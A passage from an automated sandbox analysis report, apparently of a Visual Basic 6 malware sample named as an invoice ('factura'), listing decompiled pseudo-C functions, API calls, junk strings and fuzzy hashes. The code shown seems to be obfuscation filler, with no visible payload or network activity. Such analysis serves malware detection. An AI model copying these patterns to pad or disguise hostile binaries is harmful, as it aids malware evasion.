        					_push(0xffffffff);
        					_push(0x20);
        					L004015D6();
        				}
        				_v72 = L"9/9/9";
        				_v80 = 8;
        				L004015BE();
        				_push( &_v48);
        				_push( &_v64);
        				L0040156A();
        				_push( &_v64);
        				L00401570();
        				_v32 = _t52;
        				_push( &_v64);
        				_t32 =  &_v48;
        				_push(_t32);
        				_push(2);
        				L00401600();
        				asm("wait");
        				_push(E00409809);
        				L0040166C();
        				return _t32;
        			}


















        0x0040971f
        0x00409724
        0x0040972f
        0x00409730
        0x00409739
        0x0040973a
        0x00409742
        0x00409745
        0x00409752
        0x00409757
        0x0040975c
        0x0040975f
        0x00409766
        0x00409769
        0x0040976a
        0x0040977a
        0x00409781
        0x0040978c
        0x0040978e
        0x00409793
        0x00409798
        0x0040979a
        0x0040979c
        0x0040979c
        0x004097a1
        0x004097a8
        0x004097b5
        0x004097bd
        0x004097c1
        0x004097c2
        0x004097ca
        0x004097cb
        0x004097d0
        0x004097d6
        0x004097d7
        0x004097da
        0x004097db
        0x004097dd
        0x004097e5
        0x004097e6
        0x00409803
        0x00409808

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 0040973A
        • __vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 00409752
        • #609.MSVBVM60(?,?,?,?,00401426), ref: 00409757
        • #557.MSVBVM60(00000008,?,?,?,?,?,?,?,?,00401426), ref: 0040976A
        • __vbaFreeVar.MSVBVM60(00000008,?,?,?,?,?,?,?,?,00401426), ref: 00409781
        • __vbaFileOpen.MSVBVM60(00000020,000000FF,000000CB,Laanendes7,00000008,?,?,?,?,?,?,?,?,00401426), ref: 0040979C
        • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,00000008), ref: 004097B5
        • #687.MSVBVM60(?,00000008,?,?,?,?,?,?,?,00000008), ref: 004097C2
        • __vbaDateVar.MSVBVM60(?,?,00000008,?,?,?,?,?,?,?,00000008), ref: 004097CB
        • __vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,?,?,?,?,?,?,?,00000008), ref: 004097DD
        • __vbaFreeStr.MSVBVM60(00409809), ref: 00409803
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$Free$#557#609#687ChkstkCopyDateFileListOpen
        • String ID: 9/9/9$Laanendes7
        • API String ID: 1694687497-38042795
        • Opcode ID: 196b3277e86ddc09dba683a7e7cbdcd22beeaf53b5c1bbc61fefefe5b972ae20
        • Instruction ID: f86d2d77c8b16b18d5153e71681289021deaf2db517771df69892675ab180e2f
        • Opcode Fuzzy Hash: 196b3277e86ddc09dba683a7e7cbdcd22beeaf53b5c1bbc61fefefe5b972ae20
        • Instruction Fuzzy Hash: 9E2149B1D00209ABDB10EBE5CC46FEEB7B8AF04704F50853BF111B61E1EB7899058B69
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 55%
        			E00409FA2(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, long long __fp0, intOrPtr* _a4) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				long long* _v16;
        				intOrPtr _v28;
        				char _v44;
        				intOrPtr _v52;
        				char _v60;
        				intOrPtr _v68;
        				char _v76;
        				intOrPtr _v84;
        				char _v92;
        				char* _v100;
        				intOrPtr _v108;
        				char* _t36;
        				void* _t53;
        				void* _t55;
        				long long* _t56;
        
        				_t56 = _t55 - 0xc;
        				 *[fs:0x0] = _t56;
        				L00401420();
        				_v16 = _t56;
        				_v12 = 0x401378;
        				_v8 = 0;
        				_t36 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t53);
        				asm("fldz");
        				 *_t56 = __fp0;
        				L004015B8();
        				L004015F4();
        				asm("fcomp qword [0x401280]");
        				asm("fnstsw ax");
        				asm("sahf");
        				if(__eflags != 0) {
        					_v100 = L"Ankestyrelses";
        					_v108 = 8;
        					L004015BE();
        					_t36 =  &_v44;
        					_push(_t36);
        					L004015C4();
        					L0040164E();
        				}
        				_push(0x402ab0);
        				L004014C2();
        				if(_t36 != 0x61) {
        					_v84 = 0x80020004;
        					_v92 = 0xa;
        					_v68 = 0x80020004;
        					_v76 = 0xa;
        					_v52 = 0x80020004;
        					_v60 = 0xa;
        					_v100 = L"Stavlygterne8";
        					_v108 = 8;
        					L004015BE();
        					_push( &_v92);
        					_push( &_v76);
        					_push( &_v60);
        					_push(0);
        					_push( &_v44);
        					L004014FE();
        					_push( &_v92);
        					_push( &_v76);
        					_push( &_v60);
        					_t36 =  &_v44;
        					_push(_t36);
        					_push(4);
        					L00401600();
        				}
        				_v28 =  *0x401370;
        				asm("wait");
        				_push(E0040A0DB);
        				return _t36;
        			}




















        0x00409fa5
        0x00409fb4
        0x00409fc0
        0x00409fc8
        0x00409fcb
        0x00409fd2
        0x00409fe1
        0x00409fe4
        0x00409fe8
        0x00409feb
        0x00409ff0
        0x00409ff5
        0x00409ffb
        0x00409ffd
        0x00409ffe
        0x0040a000
        0x0040a007
        0x0040a014
        0x0040a019
        0x0040a01c
        0x0040a01d
        0x0040a025
        0x0040a025
        0x0040a02a
        0x0040a02f
        0x0040a038
        0x0040a03a
        0x0040a041
        0x0040a048
        0x0040a04f
        0x0040a056
        0x0040a05d
        0x0040a064
        0x0040a06b
        0x0040a078
        0x0040a080
        0x0040a084
        0x0040a088
        0x0040a089
        0x0040a08e
        0x0040a08f
        0x0040a097
        0x0040a09b
        0x0040a09f
        0x0040a0a0
        0x0040a0a3
        0x0040a0a4
        0x0040a0a6
        0x0040a0ab
        0x0040a0b4
        0x0040a0b7
        0x0040a0b8
        0x00000000

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 00409FC0
        • #583.MSVBVM60(?,?,?,?,?,?,00401426), ref: 00409FEB
        • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401426), ref: 00409FF0
        • __vbaVarDup.MSVBVM60 ref: 0040A014
        • #529.MSVBVM60(?), ref: 0040A01D
        • __vbaFreeVar.MSVBVM60(?), ref: 0040A025
        • #516.MSVBVM60(00402AB0,?,?,?,?,?,?,00401426), ref: 0040A02F
        • __vbaVarDup.MSVBVM60(00402AB0,?), ref: 0040A078
        • #595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A), ref: 0040A08F
        • __vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A), ref: 0040A0A6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$Free$#516#529#583#595ChkstkList
        • String ID: Ankestyrelses$Stavlygterne8
        • API String ID: 1605959742-1351759999
        • Opcode ID: 3dde9d678e727c1e00c28a87ccfaff2a17dba89fd56124057d2c7dc67d9d73f6
        • Instruction ID: 864b04378e77336a63fe531cdabb2946a2ab07fb53832f436aaf2ea8741e58b9
        • Opcode Fuzzy Hash: 3dde9d678e727c1e00c28a87ccfaff2a17dba89fd56124057d2c7dc67d9d73f6
        • Instruction Fuzzy Hash: 7C31C2B190020CEBDB00EFD0D989BDEBBB8EB04744F44452AE501BB1A1DBB95589CB69
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 53%
        			E0040A513(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				short _v28;
        				void* _v32;
        				signed int _v36;
        				void* _v40;
        				intOrPtr* _v60;
        				signed int _v64;
        				intOrPtr* _v68;
        				signed int _v72;
        				intOrPtr _v84;
        				intOrPtr* _v88;
        				signed int _v92;
        				signed int _v96;
        				signed int _t54;
        				signed int _t59;
        				signed int _t60;
        				void* _t68;
        				void* _t70;
        				intOrPtr _t71;
        
        				_t71 = _t70 - 0xc;
        				 *[fs:0x0] = _t71;
        				L00401420();
        				_v16 = _t71;
        				_v12 = 0x4013b8;
        				_v8 = 0;
        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x48,  *[fs:0x0], 0x401426, _t68);
        				if( *0x40c33c != 0) {
        					_v88 = 0x40c33c;
        				} else {
        					_push(0x40c33c);
        					_push(0x4026e4);
        					L0040165A();
        					_v88 = 0x40c33c;
        				}
        				_v60 =  *_v88;
        				_t54 =  *((intOrPtr*)( *_v60 + 0x14))(_v60,  &_v40);
        				asm("fclex");
        				_v64 = _t54;
        				if(_v64 >= 0) {
        					_v92 = _v92 & 0x00000000;
        				} else {
        					_push(0x14);
        					_push(0x4026d4);
        					_push(_v60);
        					_push(_v64);
        					L00401654();
        					_v92 = _t54;
        				}
        				_v68 = _v40;
        				_t59 =  *((intOrPtr*)( *_v68 + 0x110))(_v68,  &_v36);
        				asm("fclex");
        				_v72 = _t59;
        				if(_v72 >= 0) {
        					_v96 = _v96 & 0x00000000;
        				} else {
        					_push(0x110);
        					_push(0x402934);
        					_push(_v68);
        					_push(_v72);
        					L00401654();
        					_v96 = _t59;
        				}
        				_t60 = _v36;
        				_v84 = _t60;
        				_v36 = _v36 & 0x00000000;
        				L00401678();
        				L004015E8();
        				_push(2);
        				_push("ABC");
        				_push(0x402954);
        				_push(0);
        				L00401564();
        				if(_t60 != 3) {
        					_push(L"GUMME");
        					_push(0x2e);
        					_push(0xffffffff);
        					_push(0x20);
        					L004015D6();
        				}
        				_v28 = 0x228e;
        				_push(E0040A665);
        				L0040166C();
        				return _t60;
        			}
























        0x0040a516
        0x0040a525
        0x0040a52f
        0x0040a537
        0x0040a53a
        0x0040a541
        0x0040a550
        0x0040a55a
        0x0040a574
        0x0040a55c
        0x0040a55c
        0x0040a561
        0x0040a566
        0x0040a56b
        0x0040a56b
        0x0040a580
        0x0040a58f
        0x0040a592
        0x0040a594
        0x0040a59b
        0x0040a5b4
        0x0040a59d
        0x0040a59d
        0x0040a59f
        0x0040a5a4
        0x0040a5a7
        0x0040a5aa
        0x0040a5af
        0x0040a5af
        0x0040a5bb
        0x0040a5ca
        0x0040a5d0
        0x0040a5d2
        0x0040a5d9
        0x0040a5f5
        0x0040a5db
        0x0040a5db
        0x0040a5e0
        0x0040a5e5
        0x0040a5e8
        0x0040a5eb
        0x0040a5f0
        0x0040a5f0
        0x0040a5f9
        0x0040a5fc
        0x0040a5ff
        0x0040a609
        0x0040a611
        0x0040a616
        0x0040a618
        0x0040a61d
        0x0040a622
        0x0040a624
        0x0040a62c
        0x0040a62e
        0x0040a633
        0x0040a635
        0x0040a637
        0x0040a639
        0x0040a639
        0x0040a63e
        0x0040a644
        0x0040a65f
        0x0040a664

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 0040A52F
        • __vbaNew2.MSVBVM60(004026E4,0040C33C,?,?,?,?,00401426), ref: 0040A566
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,00000014), ref: 0040A5AA
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402934,00000110), ref: 0040A5EB
        • __vbaStrMove.MSVBVM60 ref: 0040A609
        • __vbaFreeObj.MSVBVM60 ref: 0040A611
        • __vbaInStr.MSVBVM60(00000000,00402954,ABC,00000002), ref: 0040A624
        • __vbaFileOpen.MSVBVM60(00000020,000000FF,0000002E,GUMME,00000000,00402954,ABC,00000002), ref: 0040A639
        • __vbaFreeStr.MSVBVM60(0040A665,00000000,00402954,ABC,00000002), ref: 0040A65F
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$CheckFreeHresult$ChkstkFileMoveNew2Open
        • String ID: ABC$GUMME
        • API String ID: 3746238256-2158301107
        • Opcode ID: 61b60d5fa60bb4e7e7e56d23c09ac7f4d330d7e7d646b81aa55fad1ed7943005
        • Instruction ID: ae1049380588b2ebddeee5d168d9e9f09cd0bbd490c475ec01e6100fe610767c
        • Opcode Fuzzy Hash: 61b60d5fa60bb4e7e7e56d23c09ac7f4d330d7e7d646b81aa55fad1ed7943005
        • Instruction Fuzzy Hash: 9D41E270D40308EFDB00EF95DD8AF9DBBB4BB18708F20852AF101BA2E1D7B959558B59
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 65%
        			E0040A416(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				short _v28;
        				void* _v32;
        				intOrPtr _v40;
        				char _v48;
        				short _v68;
        				void* _t20;
        				signed int _t21;
        				short _t25;
        				void* _t33;
        				void* _t35;
        				intOrPtr _t36;
        
        				_t36 = _t35 - 0xc;
        				 *[fs:0x0] = _t36;
        				L00401420();
        				_v16 = _t36;
        				_v12 = 0x4013a8;
        				_v8 = 0;
        				_t20 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x401426, _t33);
        				_push(0x4029a8);
        				L0040153A();
        				if(_t20 != 2) {
        					_push(L"Lombard");
        					L004014EC();
        				}
        				_v40 = 2;
        				_v48 = 2;
        				_t21 =  &_v48;
        				_push(_t21);
        				_push(1);
        				_push(L"FGFG");
        				L004014E6();
        				L00401678();
        				_push(_t21);
        				_push(0x402b94);
        				L0040167E();
        				asm("sbb eax, eax");
        				_v68 =  ~( ~( ~_t21));
        				L0040166C();
        				L0040164E();
        				_t25 = _v68;
        				if(_t25 != 0) {
        					L004014E0();
        				}
        				_v28 = 0x34d1;
        				_push(E0040A4EA);
        				return _t25;
        			}

















        0x0040a419
        0x0040a428
        0x0040a432
        0x0040a43a
        0x0040a43d
        0x0040a444
        0x0040a453
        0x0040a456
        0x0040a45b
        0x0040a463
        0x0040a465
        0x0040a46a
        0x0040a46a
        0x0040a46f
        0x0040a476
        0x0040a47d
        0x0040a480
        0x0040a481
        0x0040a483
        0x0040a488
        0x0040a492
        0x0040a497
        0x0040a498
        0x0040a49d
        0x0040a4a4
        0x0040a4aa
        0x0040a4b1
        0x0040a4b9
        0x0040a4be
        0x0040a4c4
        0x0040a4c6
        0x0040a4c6
        0x0040a4cb
        0x0040a4d1
        0x00000000

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 0040A432
        • __vbaI4Str.MSVBVM60(004029A8,?,?,?,?,00401426), ref: 0040A45B
        • #531.MSVBVM60(Lombard,004029A8,?,?,?,?,00401426), ref: 0040A46A
        • #628.MSVBVM60(FGFG,00000001,00000002), ref: 0040A488
        • __vbaStrMove.MSVBVM60(FGFG,00000001,00000002), ref: 0040A492
        • __vbaStrCmp.MSVBVM60(00402B94,00000000,FGFG,00000001,00000002), ref: 0040A49D
        • __vbaFreeStr.MSVBVM60(00402B94,00000000,FGFG,00000001,00000002), ref: 0040A4B1
        • __vbaFreeVar.MSVBVM60(00402B94,00000000,FGFG,00000001,00000002), ref: 0040A4B9
        • __vbaEnd.MSVBVM60(00402B94,00000000,FGFG,00000001,00000002), ref: 0040A4C6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$Free$#531#628ChkstkMove
        • String ID: FGFG$Lombard
        • API String ID: 845745086-2614402114
        • Opcode ID: cdbe58079c5b2d704fddd0c550a9b743908724a33b2dc9fa8964a25cf877668c
        • Instruction ID: 4a309e415e34b54ebaae6198b648cdf69c86de27e98954320782a1202e15f6f4
        • Opcode Fuzzy Hash: cdbe58079c5b2d704fddd0c550a9b743908724a33b2dc9fa8964a25cf877668c
        • Instruction Fuzzy Hash: 80114274A40209ABCB10EFA5C94ABAE77B4AF04744F50843BF401B71E1DBBD5905C75A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 48%
        			E00408D92(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				void* _v28;
        				intOrPtr _v32;
        				signed int _v36;
        				char _v40;
        				signed char _v44;
        				signed int _v48;
        				intOrPtr* _v52;
        				signed int _v56;
        				signed char _v68;
        				signed char* _v72;
        				signed int _v76;
        				signed int _v80;
        				signed int _v84;
        				signed int _v88;
        				signed int _t68;
        				signed int _t73;
        				signed char _t74;
        				void* _t85;
        				void* _t87;
        				intOrPtr _t88;
        				signed long long _t92;
        
        				_t88 = _t87 - 0xc;
        				 *[fs:0x0] = _t88;
        				L00401420();
        				_v16 = _t88;
        				_v12 = 0x401270;
        				_v8 = 0;
        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x401426, _t85);
        				if( *0x40c33c != 0) {
        					_v72 = 0x40c33c;
        				} else {
        					_push(0x40c33c);
        					_push(0x4026e4);
        					L0040165A();
        					_v72 = 0x40c33c;
        				}
        				_v44 =  *_v72;
        				_t68 =  *((intOrPtr*)( *_v44 + 0x14))(_v44,  &_v40);
        				asm("fclex");
        				_v48 = _t68;
        				if(_v48 >= 0) {
        					_v76 = _v76 & 0x00000000;
        				} else {
        					_push(0x14);
        					_push(0x4026d4);
        					_push(_v44);
        					_push(_v48);
        					L00401654();
        					_v76 = _t68;
        				}
        				_v52 = _v40;
        				_t73 =  *((intOrPtr*)( *_v52 + 0x130))(_v52,  &_v36);
        				asm("fclex");
        				_v56 = _t73;
        				if(_v56 >= 0) {
        					_v80 = _v80 & 0x00000000;
        				} else {
        					_push(0x130);
        					_push(0x402934);
        					_push(_v52);
        					_push(_v56);
        					L00401654();
        					_v80 = _t73;
        				}
        				_t74 = _v36;
        				_v68 = _t74;
        				_v36 = _v36 & 0x00000000;
        				L00401678();
        				L004015E8();
        				_push(2);
        				_push("ABC");
        				_push(0x402954);
        				_push(0);
        				L004015D0();
        				if(_t74 != 5) {
        					_t92 =  *0x401268 *  *0x401260;
        					asm("fnstsw ax");
        					if((_t74 & 0x0000000d) != 0) {
        						return __imp____vbaFPException();
        					}
        					_v84 = _t92;
        					_v76 = _v84;
        					_t74 =  *((intOrPtr*)( *_a4 + 0x84))(_a4,  &_v40);
        					asm("fclex");
        					_v44 = _t74;
        					if(_v44 >= 0) {
        						_v88 = _v88 & 0x00000000;
        					} else {
        						_push(0x84);
        						_push(0x402484);
        						_push(_a4);
        						_push(_v44);
        						L00401654();
        						_v88 = _t74;
        					}
        				}
        				_v32 =  *0x401258;
        				asm("wait");
        				_push(E00408F2F);
        				L0040166C();
        				return _t74;
        			}



























        0x00408d95
        0x00408da4
        0x00408dae
        0x00408db6
        0x00408db9
        0x00408dc0
        0x00408dcf
        0x00408dd9
        0x00408df3
        0x00408ddb
        0x00408ddb
        0x00408de0
        0x00408de5
        0x00408dea
        0x00408dea
        0x00408dff
        0x00408e0e
        0x00408e11
        0x00408e13
        0x00408e1a
        0x00408e33
        0x00408e1c
        0x00408e1c
        0x00408e1e
        0x00408e23
        0x00408e26
        0x00408e29
        0x00408e2e
        0x00408e2e
        0x00408e3a
        0x00408e49
        0x00408e4f
        0x00408e51
        0x00408e58
        0x00408e74
        0x00408e5a
        0x00408e5a
        0x00408e5f
        0x00408e64
        0x00408e67
        0x00408e6a
        0x00408e6f
        0x00408e6f
        0x00408e78
        0x00408e7b
        0x00408e7e
        0x00408e88
        0x00408e90
        0x00408e95
        0x00408e97
        0x00408e9c
        0x00408ea1
        0x00408ea3
        0x00408eab
        0x00408eb3
        0x00408eb9
        0x00408ebd
        0x0040142c
        0x0040142c
        0x00408ec3
        0x00408eca
        0x00408ed5
        0x00408edb
        0x00408edd
        0x00408ee4
        0x00408f00
        0x00408ee6
        0x00408ee6
        0x00408eeb
        0x00408ef0
        0x00408ef3
        0x00408ef6
        0x00408efb
        0x00408efb
        0x00408ee4
        0x00408f0a
        0x00408f0d
        0x00408f0e
        0x00408f29
        0x00408f2e

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 00408DAE
        • __vbaNew2.MSVBVM60(004026E4,0040C33C,?,?,?,?,00401426), ref: 00408DE5
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,00000014), ref: 00408E29
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402934,00000130), ref: 00408E6A
        • __vbaStrMove.MSVBVM60(00000000,?,00402934,00000130), ref: 00408E88
        • __vbaFreeObj.MSVBVM60(00000000,?,00402934,00000130), ref: 00408E90
        • __vbaInStrB.MSVBVM60(00000000,00402954,ABC,00000002), ref: 00408EA3
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401270,00402484,00000084,?,00000000,00402954,ABC,00000002), ref: 00408EF6
        • __vbaFreeStr.MSVBVM60(00408F2F,00000000,00402954,ABC,00000002), ref: 00408F29
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$CheckHresult$Free$ChkstkMoveNew2
        • String ID: ABC
        • API String ID: 670677746-2743272264
        • Opcode ID: 45f00b66c91a0381b391a4af9609b5790bdbe07bd525c805d60f012ebc005755
        • Instruction ID: 061f8633a8cec4f2a96e294f7c8d0de8b81816a1abed86a6593cdfd7162fa9f4
        • Opcode Fuzzy Hash: 45f00b66c91a0381b391a4af9609b5790bdbe07bd525c805d60f012ebc005755
        • Instruction Fuzzy Hash: 2041E170900209EFCB00EFA5DA89BDDBBB1FF18708F10856AE145B62E0CB795945DF58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 70%
        			E00408CAB(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				void* _v28;
        				char _v36;
        				char _v44;
        				short _v64;
        				char* _t27;
        				short _t28;
        				void* _t40;
        				void* _t42;
        				intOrPtr _t43;
        
        				_t43 = _t42 - 0xc;
        				 *[fs:0x0] = _t43;
        				L00401420();
        				_v16 = _t43;
        				_v12 = 0x401248;
        				_v8 = 0;
        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x30,  *[fs:0x0], 0x401426, _t40);
        				_v36 = 2;
        				_v44 = 2;
        				_push( &_v44);
        				L004015E2();
        				L00401678();
        				L0040164E();
        				_v36 = 0x845a5d;
        				_v44 = 3;
        				_t27 =  &_v44;
        				_push(_t27);
        				L004015DC();
        				_v64 =  ~(0 | _t27 != 0x0000ffff);
        				L0040164E();
        				_t28 = _v64;
        				if(_t28 != 0) {
        					_push(L"Mislike");
        					_push(0x5b);
        					_push(0xffffffff);
        					_push(0x20);
        					L004015D6();
        				}
        				_push(E00408D73);
        				L0040166C();
        				return _t28;
        			}















        0x00408cae
        0x00408cbd
        0x00408cc7
        0x00408ccf
        0x00408cd2
        0x00408cd9
        0x00408ce8
        0x00408ceb
        0x00408cf2
        0x00408cfc
        0x00408cfd
        0x00408d07
        0x00408d0f
        0x00408d14
        0x00408d1b
        0x00408d22
        0x00408d25
        0x00408d26
        0x00408d36
        0x00408d3d
        0x00408d42
        0x00408d48
        0x00408d4a
        0x00408d4f
        0x00408d51
        0x00408d53
        0x00408d55
        0x00408d55
        0x00408d5a
        0x00408d6d
        0x00408d72

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 00408CC7
        • #536.MSVBVM60(00000002), ref: 00408CFD
        • __vbaStrMove.MSVBVM60(00000002), ref: 00408D07
        • __vbaFreeVar.MSVBVM60(00000002), ref: 00408D0F
        • #561.MSVBVM60(00000003,00000002), ref: 00408D26
        • __vbaFreeVar.MSVBVM60(00000003,00000002), ref: 00408D3D
        • __vbaFileOpen.MSVBVM60(00000020,000000FF,0000005B,Mislike,00000003,00000002), ref: 00408D55
        • __vbaFreeStr.MSVBVM60(00408D73,00000003,00000002), ref: 00408D6D
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$Free$#536#561ChkstkFileMoveOpen
        • String ID: Mislike
        • API String ID: 36235136-2753466597
        • Opcode ID: e3f2dad8b2a9839efeeda8bb2d399947cf88829036c1a7351c7237d4810bafee
        • Instruction ID: 88236c19a57bf4f3f8f3b5dd41b6f8785fd085712f05bcf07473127ed9282cec
        • Opcode Fuzzy Hash: e3f2dad8b2a9839efeeda8bb2d399947cf88829036c1a7351c7237d4810bafee
        • Instruction Fuzzy Hash: 00112B75900208ABCB14EFA1CC5ABDEBBB8BF04714F54463AF101BA2E1DB7C9545CB58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 54%
        			E0040A7FA(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				short _v28;
        				char _v32;
        				void* _v36;
        				void* _v40;
        				signed int _v44;
        				signed int _v48;
        				intOrPtr* _v52;
        				signed int _v56;
        				intOrPtr* _v68;
        				signed int _v72;
        				signed int _v76;
        				signed int _v80;
        				signed int _v84;
        				signed int _t73;
        				signed int _t78;
        				signed int _t83;
        				signed int _t87;
        				void* _t95;
        				void* _t97;
        				intOrPtr _t98;
        
        				_t98 = _t97 - 0xc;
        				 *[fs:0x0] = _t98;
        				L00401420();
        				_v16 = _t98;
        				_v12 = 0x4013d8;
        				_v8 = 0;
        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x401426, _t95);
        				if( *0x40c33c != 0) {
        					_v68 = 0x40c33c;
        				} else {
        					_push(0x40c33c);
        					_push(0x4026e4);
        					L0040165A();
        					_v68 = 0x40c33c;
        				}
        				_v44 =  *_v68;
        				_t73 =  *((intOrPtr*)( *_v44 + 0x14))(_v44,  &_v36);
        				asm("fclex");
        				_v48 = _t73;
        				if(_v48 >= 0) {
        					_v72 = _v72 & 0x00000000;
        				} else {
        					_push(0x14);
        					_push(0x4026d4);
        					_push(_v44);
        					_push(_v48);
        					L00401654();
        					_v72 = _t73;
        				}
        				_v52 = _v36;
        				_t78 =  *((intOrPtr*)( *_v52 + 0x140))(_v52,  &_v40);
        				asm("fclex");
        				_v56 = _t78;
        				if(_v56 >= 0) {
        					_v76 = _v76 & 0x00000000;
        				} else {
        					_push(0x140);
        					_push(0x402934);
        					_push(_v52);
        					_push(_v56);
        					L00401654();
        					_v76 = _t78;
        				}
        				_v28 = _v40;
        				L004015E8();
        				_t83 =  *((intOrPtr*)( *_a4 + 0xa8))(_a4,  &_v32);
        				asm("fclex");
        				_v44 = _t83;
        				if(_v44 >= 0) {
        					_v80 = _v80 & 0x00000000;
        				} else {
        					_push(0xa8);
        					_push(0x402484);
        					_push(_a4);
        					_push(_v44);
        					L00401654();
        					_v80 = _t83;
        				}
        				_push(_v32);
        				_push(0);
        				L0040167E();
        				asm("sbb eax, eax");
        				_v48 =  ~( ~_t83 + 1);
        				L0040166C();
        				_t87 = _v48;
        				if(_t87 != 0) {
        					_t87 =  *((intOrPtr*)( *_a4 + 0x15c))(_a4, 0x3695);
        					asm("fclex");
        					_v44 = _t87;
        					if(_v44 >= 0) {
        						_v84 = _v84 & 0x00000000;
        					} else {
        						_push(0x15c);
        						_push(0x402484);
        						_push(_a4);
        						_push(_v44);
        						L00401654();
        						_v84 = _t87;
        					}
        				}
        				_push(E0040A9A5);
        				return _t87;
        			}


























        0x0040a7fd
        0x0040a80c
        0x0040a816
        0x0040a81e
        0x0040a821
        0x0040a828
        0x0040a837
        0x0040a841
        0x0040a85b
        0x0040a843
        0x0040a843
        0x0040a848
